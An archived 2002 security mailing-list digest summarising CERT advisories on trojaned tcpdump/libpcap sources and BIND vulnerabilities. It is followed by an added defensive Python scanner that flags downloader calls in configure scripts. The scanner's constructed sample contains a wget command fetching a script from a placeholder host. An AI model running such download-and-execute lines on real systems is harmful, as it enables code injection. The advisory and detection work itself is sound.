-----Original Message-----
From: NIPC Watch [mailto:nipcwatch@private]
Sent: Friday, November 15, 2002 7:29 AM
To: Cyber Threats
Subject: [Cyber_threats] Daily News 11/15/02

November 13, CERT/CC
CERT Advisory CA-2002-30 Trojan Horse tcpdump and libpcap Distributions. The CERT/CC has received reports that several of the released source code distributions of the libpcap and tcpdump packages were modified by an intruder and contain a Trojan horse. The CERT/CC has received reports that some copies of the source code for libpcap, a packet acquisition library, and tcpdump, a network sniffer, have been modified by an intruder and contain a Trojan horse. The Trojan horse version of the tcpdump source code distribution contains malicious code that is run when the software is compiled. This code, executed from the tcpdump configure script, will attempt to connect (via wget, lynx, or fetch) to port 80/tcp on a fixed hostname in order to download a shell script named services. In turn, this downloaded shell script is executed to generate a C file (conftes.c), which is subsequently compiled and run.
Source. http://www.cert.org/advisories/CA-2002-30.html

November 14, CERT/CC
CERT(r) Advisory CA-2002-31 Multiple Vulnerabilities in BIND. Multiple vulnerabilities with varying impacts have been found in BIND, the popular domain name server and client library software package from the Internet Software Consortium (ISC). Information on these vulnerabilities can be found separately in notes published by CERT/CC. Some of these vulnerabilities may allow remote attackers to execute arbitrary code with the privileges of the user running named, (typically root), or with the privileges of vulnerable client applications. The other vulnerabilities will allow remote attackers to disrupt the normal operation of DNS name service running on victim servers. An attacker could execute arbitrary code with the privileges of the application that made the request or cause a denial of service. The attacker would need to control the contents of DNS responses, possibly by spoofing responses or gaining control of a DNS server.
Source. http://www.cert.org/advisories/CA-2002-31.html

Virus: #1 Virus in USA: WORM_BUGBEAR.A
Source: http://wtc.trendmicro.com/wtc/wmap.html, Trend World Micro Virus Tracking Center [Infected Computers, North America, Past 24 hours, #1 in United States]

Top 10 Target Ports
137(netbios-ns); 80(http); 1433(ms-sql-s); 21(ftp); 1080(socks); 25(smtp); 139(netbios-ssn); 445(microsoft-ds); 27374(asp); 111(sunrpc)
Source: http://isc.incidents.org/top10.html; Internet Storm Center

_______________________________________________
Cyber_Threats mailing list
Cyber_Threats@listserv
http://listserv.infragard.org/mailman/listinfo/cyber_threats
This archive was generated by hypermail 2b30 : Fri Nov 15 2002 - 15:08:38 PST
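
The build-time behaviour described for CA-2002-30 (a configure script invoking wget, lynx or fetch, and a generated file named conftes.c) can be looked for in an unpacked source tree before anything is built. The Python triage check below is an added example, not part of the original message or the advisory; the function names are hypothetical, and the sample script text and the host name `host.invalid` are constructed.

```python
import os
import re

# Downloaders named in the advisory, matched only where a command can start.
CMD_POS = r"(?:^|[;&|(`]|\b(?:if|then|else|do|eval|exec)\s)\s*"
DOWNLOADER = re.compile(CMD_POS + r"(wget|lynx|fetch)(?=\s|$)")
# Stock autoconf uses "conftest"; the advisory's file name lacks the final "t".
DROPPED_FILE = re.compile(r"\bconftes\.c\b")
BUILD_SCRIPTS = {"configure", "configure.in", "configure.ac"}

def scan_script(text):
    """Return (line_number, reason, line) for each suspicious line."""
    hits = []
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and whole-line comments
        match = DOWNLOADER.search(line)
        if match:
            hits.append((number, "downloader:" + match.group(1), line))
        if DROPPED_FILE.search(line):
            hits.append((number, "file:conftes.c", line))
    return hits

def scan_tree(root):
    """Scan every build script under an unpacked source tree."""
    findings = {}
    for folder, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name in BUILD_SCRIPTS:
                path = os.path.join(folder, name)
                with open(path, encoding="latin-1") as handle:
                    hits = scan_script(handle.read())
                if hits:
                    findings[os.path.relpath(path, root)] = hits
    return findings

# Constructed sample (not the real trojan code): benign lines, then two lines
# that show only the behaviours the advisory describes.
SAMPLE = """\
# Guess values for system-dependent variables
rm -f conftest.c conftest.o
echo "checking for fetch support in libfoo"
wget -q http://host.invalid/services
cc -o conftes conftes.c
"""

if __name__ == "__main__":
    for number, reason, line in scan_script(SAMPLE):
        print(number, reason, line)
```

A clean result only means these literal patterns are absent; script text that builds the command name indirectly would not match.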